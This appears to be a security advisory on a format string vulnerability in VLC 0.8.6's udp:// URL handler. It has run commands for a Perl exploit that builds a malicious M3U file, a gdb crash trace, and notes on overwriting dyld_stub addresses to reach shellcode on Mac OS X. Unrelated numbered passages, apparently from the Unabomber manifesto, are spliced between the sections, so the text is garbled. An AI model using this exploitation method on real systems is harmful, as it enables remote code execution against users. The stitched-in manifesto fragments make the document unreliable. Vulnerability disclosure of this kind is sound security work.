BACK

CREDIT

POC or EXPLOIT

REFERENCES


I hear your plea

Summary

The following description of the software is provided by vendor (VideoLAN):

VideoLAN is a software project, which produces free software for video, released under the GNU General Public License. The main product is the cross-platform VLC media player. The VLC media player is a highly portable multimedia player for various audio and video formats (MPEG1, MPEG2, MPEG4, DivX, mp3, ogg, ...) as well as DVDs, VCDs, and various streaming protocols. It can also be used as a server to stream in unicast or multicast in IPv4 or IPv6 on a high-bandwidth network.

A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC.

Affected versions

This issue has been successfully exploited in VLC version 0.8.6 for Mac OS X. Previous versions and other platforms might be affected (thanks to David Maynor for confirming the issue in the Microsoft Windows version).

Proof of concept, exploit or instructions to reproduce

Requires a working Perl interpreter. The exploit(s) provided will create a M3U file, which can be locally opened or served remotely via web server. The exploit source code includes notes and other comments about the different options available. Both x86 and PowerPC versions are provided.

$ perl VLCMediaSlayer-x86.pl
$ open pwnage.m3u
(...)
			
1. (Paragraph 19) We are asserting that ALL, or even most, bullies and ruthless competitors suffer from feelings of inferiority.

You may want to use a suitable shellcode of your choice. The exploit will need some adjustment.

Debugging information

The following information aims to provide some details about the issue, in both Mac OS X and Microsoft Windows platforms: (might be updated as necessary)

(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /Applications/VLC.app/Contents/MacOS/VLC 
Reading symbols for shared libraries . done
Reading symbols for shared libraries + done
Reading symbols for shared libraries ++++ done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
[00000297] access_udp access error: cannot open socket
Reading symbols for shared libraries + done
Reading symbols for shared libraries + done
[00000303] access_udp access error: cannot open socket

Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
[Switching to process 785 thread 0x7c0f]
0xa0011397 in dyld_stub___vfprintf ()
(gdb) info registers 
eax            0xb04882b4       -1337425228
ecx            0x0      0
edx            0xa00023c0       -1610603584
ebx            0x90022851       -1878906799
esp            0xb04881dd       0xb04881dd
ebp            0xb0488319       0xb0488319
esi            0x400    1024
edi            0x29eb400        43955200
eip            0xa0011397       0xa0011397 
eflags         0x10282  66178
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55
			
4. (Paragraph 28) There are many individuals of the middle and upper classes who resist some of these values, but usually their resistance is more or less covert. Such resistance appears in the mass media only to a very limited extent. The main thrust of propaganda in our society is in favor of the stated values.

Notes

Exploitation conditions

Kevin has written a nice explanation about format strings on OS X, and overwriting dyld_stub addresses: Non eXecutable Stack Lovin on OSX86 (05/18/06).

(gdb) x/6i 0x69027f
0x69027f <dyld_stub_exit+3>:    js     0x690210 <yytext_ptr+5008>
(...)
0x690286 <dyld_stub_dlopen>:    call   0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>
(...)
0x690290 <dyld_stub_free>:      jmp    0x90004e30 <free>
0x690295 <dyld_stub_malloc>:    jmp    0x9000243a <malloc>
			

For successful exploitation on x86, an overwrite of a dyld_stub_ is necessary. For example, causing a jump into heap space where shellcode is located. In order to place shellcode at a suitable location, we need to craft a format string that writes it byte-to-byte at a specific location.

9. (Paragraph 61) We leave aside the underclass. We are speaking of the mainstream.

Read the exploit source code for further information. PowerPC doesn't require this trick for exploitation.

Workaround or temporary solution

The only potential workaround would be to disable the udp:// URL handler, uninstalling VLC, updating to CVS version when fix has been made available or simply live with the feeling of being a potential target for pwnage.

20. (Paragraph 124) For a further example of undesirable consequences of medical progress, suppose a reliable cure for cancer is discovered. Even if the treatment is too expensive to be available to any but the elite, it will greatly reduce their incentive to stop the escape of carcinogens into the environment.